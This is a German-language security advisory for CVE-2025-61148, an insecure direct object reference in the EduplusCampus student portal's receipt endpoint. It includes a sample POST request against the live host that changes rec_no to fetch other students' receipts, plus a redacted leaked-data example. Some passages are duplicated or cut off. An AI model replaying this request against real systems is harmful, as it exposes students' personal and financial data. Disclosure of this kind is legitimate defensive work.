
Die Schwachstelle befindet sich in der Student Payment API. Die Anwendung validiert nicht ordnungsgemäß, ob der Benutzer, der eine Quittung anfordert, berechtigt ist, diese einzusehen. Durch Ändern des Parameters rec_no in der API-Anfrage kann ein Angreifer auf die Quittungen anderer Benutzer zugreifen.
Die Schwachstelle besteht in der Student Payment API. Die Anwendung validiert nicht ordnungsgemäß, ob der Benutzer, der eine Quittung anfordert, berechtigt ist, diese einzusehen. Durch Ändern des Parameters rec_no in der API-Anfrage kann ein Angreifer auf die Quittungen anderer Benutzer zugreifen.
CVE-ID: CVE-2025-61148
Schwachstellentyp: Insecure Direct Object Reference (IDOR)
Betroffenes Produkt: EduplusCampus
Betroffener Endpunkt: /student/get-receipt
Forscher: Vinay Sharma
Eine kritische Schwachstelle durch einen unsicheren direkten Objektverweis (IDOR) wurde im Studentenportal von EduplusCampus (Version 3.0.1) identifiziert. Diese Schwachstelle ermöglicht es einem authentifizierten Benutzer, auf die sensiblen persönlichen und finanziellen Daten anderer Studierender zuzugreifen, indem er den Parameter rec_no in der API-Anfrage ändert.
Eine erfolgreiche Ausnutzung ermöglicht einem Angreifer den Abruf von:
Die Anwendung validiert die Autorisierung des Benutzers, der eine Zahlungsquittung anfordert, nicht ordnungsgemäß. Der Parameter rec_no ist sequenziell oder vorhersehbar, und der Server gibt die Quittungsdetails für die angeforderte Nummer zurück, ohne zu prüfen, ob sie zum aktuell angemeldeten Benutzer gehört.
/student/get-receipt ab.rec_no im JSON-Body.rec_no zu einer anderen gültigen Quittungsnummer (z. B. von PCUF-232025 auf PCUF-231824).

POST /student/get-receipt HTTP/1.1
Host: student.edupluscampus.com
Content-Type: application/json
Authorization: Bearer <token>
{
"rec_no": "PCUF-233012"
}
### Leaked DATA Example:
{
"fullname": "REDACTED_NAME",
"rollno": "CSE2019XXX",
"component_total_amount": 55000.0,
"trans_list": [
{
"date": "21-Oct-2024",
"mode": "Online",
"amount": 55000.0,
"tid": "42951XXXX"
}
]
}